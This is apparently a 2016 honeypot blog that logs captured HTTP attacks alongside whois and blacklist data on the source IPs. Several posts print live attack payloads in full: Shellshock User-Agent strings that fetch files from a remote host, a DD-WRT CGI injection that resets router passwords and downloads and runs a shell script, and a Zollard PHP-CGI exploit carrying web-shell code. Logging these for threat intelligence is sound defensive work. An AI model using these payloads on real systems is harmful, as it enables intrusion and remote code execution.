Freitag, 4. März 2016

end of life

Good morning,

as you may have already found out, the posts on this blog have been getting less and less. This is caused by the fact that my two honeypots have had some issues.

The vservers will be going down soon. So no more analytics.

Thanks to Swen for having the Germany running for so long. I am currently looking for cheap vservers in the world and talks to some people about funding the operation costs, until than....

This is the end

Donnerstag, 11. Februar 2016

159.226.162.196 - #perl wget via 204.232.209.188

BEGIN OF HTTP DATA:
2016-02-11 19:15:33
Source IP: 159.226.162.196
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 109.234.106.8
Connection: Close


 END OF DATA

The http server returned 404 at the time of the investigation


Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.

Disclaimer:This information is provided as-is and there is no guarantee
that blocking an IP or domain reported in this overview will not adversely
impact your business. Use all information provided on your own risk,
the author disclaims all warranty and shall not be liable for any damage
or impact caused.

159.226.162[.]196

    Whois Data (TeamCymru)
  • AS : 7497
  • IP : 159.226.162.196
  • BGP Prefix : 159.226.162.0/24
  • CC : CN
  • Registry : apnic
  • Allocated :
  • AS Name: CSTNET-AS-AP Computer Network Information Center,CN
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

204.232.209[.]188

    Whois Data (TeamCymru)
  • AS : 33070
  • IP : 204.232.209.188
  • BGP Prefix : 204.232.192.0/19
  • CC : US
  • Registry : arin
  • Allocated : 2009-06-24
  • AS Name: RMH-14 - Rackspace Hosting,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 213.136.72.84 . shellshock perl via 204.232.209.188
  • Reference: http://sendmespamids.blogspot.com/2016/01/2131367284-shellshock-perl-via.html
  • In db since: 2016-01-22 08:36:12.295000

Sonntag, 7. Februar 2016

178.57.115.231 - (Russian IPs) possible DD-WRT firmware via 178.57.115.231:8081

BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 178.57.115.231
GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0
Host:195.169.125.87:8080

 END OF DATA

The ug.sh tries to download an binary file





 Just by taking a look of the xxd and strings output of the file, it looks like an DD-WRT firmware file.


Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.

Disclaimer:This information is provided as-is and there is no guarantee
that blocking an IP or domain reported in this overview will not adversely
impact your business. Use all information provided on your own risk,
the author disclaims all warranty and shall not be liable for any damage
or impact caused.

178.57.115[.]231

    Whois Data (TeamCymru)
  • AS : 60139
  • IP : 178.57.115.231
  • BGP Prefix : 178.57.112.0/21
  • CC : RU
  • Registry : ripencc
  • Allocated : 2010-02-02
  • AS Name: Z-TELECOM Z-Telecom Ltd,RU
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

178.57.115[.]231

    Whois Data (TeamCymru)
  • AS : 60139
  • IP : 178.57.115.231
  • BGP Prefix : 178.57.112.0/21
  • CC : RU
  • Registry : ripencc
  • Allocated : 2010-02-02
  • AS Name: Z-TELECOM Z-Telecom Ltd,RU
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

Sonntag, 24. Januar 2016

61.49.45.47 - WhatWeb/0.4.8-dev (first time seen)

BEGIN OF HTTP DATA:
2016-01-23 16:47:13
Source IP: 61.49.45.47
GET / HTTP/1.1
User-Agent: WhatWeb/0.4.8-dev
Host: 109.234.106.8:8080
Connection: close
Accept: */*
 For more information https://user-agents.me/crawler/whatweb048-dev
According to some news in the web, this crawler is meant to identify the running webpages on a server.

61.49.45[.]47

    Whois Data (TeamCymru)
  • AS : 4808
  • IP : 61.49.45.47
  • BGP Prefix : 61.49.0.0/18
  • CC : CN
  • Registry : apnic
  • Allocated : 2001-06-28
  • AS Name: CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network,CN
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/61.49.45.47

Donnerstag, 21. Januar 2016

213.136.72.84 . Shellshock perl via 204.232.209.188

BEGIN OF HTTP DATA:
2016-01-20 09:58:59
Source IP: 213.136.72.84
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 195.169.125.87
Connection: Close


 END OF DATA

213.136.72[.]84

    Whois Data (TeamCymru)
  • AS : 51167
  • IP : 213.136.72.84
  • BGP Prefix : 213.136.72.0/23
  • CC : DE
  • Registry : ripencc
  • Allocated : 2000-02-28
  • AS Name: CONTABO Contabo GmbH,DE
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/213.136.72.84
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/213.136.72.84

204.232.209[.]188

    Whois Data (TeamCymru)
  • AS : 33070
  • IP : 204.232.209.188
  • BGP Prefix : 204.232.192.0/19
  • CC : US
  • Registry : arin
  • Allocated : 2009-06-24
  • AS Name: RMH-14 - Rackspace Hosting,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

92.45.197.218 - Zollard php execution

BEGIN OF HTTP DATA:
2016-01-21 09:47:25
Source IP: 92.45.197.218
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F
%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%6
9%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%
66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63
%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1817
Connection: close

<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disabl

END OF DATA
Sadly the request was to long to be fully logged by the fake HTTP server

The POST messages is
POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n HTTP/1.1

92.45.197[.]218

    Whois Data (TeamCymru)
  • AS : 34984
  • IP : 92.45.197.218
  • BGP Prefix : 92.45.196.0/23
  • CC : TR
  • Registry : ripencc
  • Allocated : 2007-12-17
  • AS Name: TELLCOM-AS TELLCOM ILETISIM HIZMETLERI A.S.,TR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

 

Mittwoch, 13. Januar 2016

Scanner seen on January 14, 2016

  • 185.130.5.207 - muieblackcat
  • 37.142.32.222 - masscan/1.0
  • 149.78.19.136 -  masscan/1.0
  • 195.169.125.87 -  zgrab/0.x 
  • 185.130.5.235 -  muieblackcat

185.130.5[.]207

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.207
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.207
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.207
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

37.142.32[.]222

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 37.142.32.222
  • BGP Prefix : 37.142.32.0/22
  • CC : IL
  • Registry : ripencc
  • Allocated : 2012-02-29
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/37.142.32.222

149.78.19[.]136

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 149.78.19.136
  • BGP Prefix : 149.78.0.0/19
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/149.78.19.136
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/149.78.19.136
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

195.169.125[.]87

    Whois Data (TeamCymru)
  • AS : 1103
  • IP : 195.169.125.87
  • BGP Prefix : 195.169.125.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated :
  • AS Name: SURFNET-NL SURFnet, The Netherlands,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 50.118.172.34 / 195.169.125.87 - http javascript/html submission
  • Reference: http://sendmespamids.blogspot.com/2015/09/5011817234-http-javascripthtml.html
  • In db since: 2015-09-24 08:17:16.658000
    Source: Local Feed Database
  • Title: 46.172.71.251, 195.169.125.87 - to ping 212.47.238.143
  • Reference: http://sendmespamids.blogspot.com/2016/01/4617271251-19516912587-to-ping.html
  • In db since: 2016-01-09 11:54:24.541062

185.130.5[.]235

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.235
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.235
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.235
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt